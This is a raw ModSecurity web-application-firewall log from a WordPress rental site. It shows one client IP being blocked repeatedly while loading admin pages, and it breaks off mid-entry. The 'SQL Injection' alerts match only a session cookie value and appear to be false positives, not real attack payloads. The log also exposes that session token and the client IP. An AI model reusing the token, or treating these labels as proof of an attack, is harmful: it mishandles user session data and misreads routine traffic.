https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:16.768899 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFgA-Qm4vhlWBPlMjnfgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:17.391614 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFgA-Qm4vhlWBPlMjnfgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:17.606055 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFgQ-Qm4vhlWBPlMjnfwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:17.606354 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFgQ-Qm4vhlWBPlMjnfwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:18.169241 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFgQ-Qm4vhlWBPlMjnfwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:18.277383 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFgg-Qm4vhlWBPlMjngQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:18.277691 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFgg-Qm4vhlWBPlMjngQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:18.873051 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFgg-Qm4vhlWBPlMjngQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:18.971572 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFgg-Qm4vhlWBPlMjnggAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:18.971857 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFgg-Qm4vhlWBPlMjnggAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:19.362142 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFgg-Qm4vhlWBPlMjnggAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:20.006666 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFhA-Qm4vhlWBPlMjnhAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:20.007030 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFhA-Qm4vhlWBPlMjnhAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:20.679781 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFhA-Qm4vhlWBPlMjnhAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:21.193374 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFhQ-Qm4vhlWBPlMjnhgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:21.193654 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFhQ-Qm4vhlWBPlMjnhgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:21.850867 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFhQ-Qm4vhlWBPlMjnhgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:22.254872 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFhg-Qm4vhlWBPlMjnhwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:22.255199 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFhg-Qm4vhlWBPlMjnhwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:22.884739 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFhg-Qm4vhlWBPlMjnhwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:23.150106 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFhw-Qm4vhlWBPlMjnjwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:23.150425 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFhw-Qm4vhlWBPlMjnjwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:23.762196 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFhw-Qm4vhlWBPlMjnjwAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:23.902055 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFhw-Qm4vhlWBPlMjnkAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:23.902496 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFhw-Qm4vhlWBPlMjnkAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:24.451586 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFhw-Qm4vhlWBPlMjnkAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:24.566279 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFiA-Qm4vhlWBPlMjnkgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:24.566568 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFiA-Qm4vhlWBPlMjnkgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:25.017017 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFiA-Qm4vhlWBPlMjnkgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:25.252249 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFiQ-Qm4vhlWBPlMjnlgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:25.252538 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFiQ-Qm4vhlWBPlMjnlgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:25.864389 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFiQ-Qm4vhlWBPlMjnlgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:26.266482 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFig-Qm4vhlWBPlMjnmAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:26.266763 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFig-Qm4vhlWBPlMjnmAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:26.947131 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFig-Qm4vhlWBPlMjnmAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:36:27.424752 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id 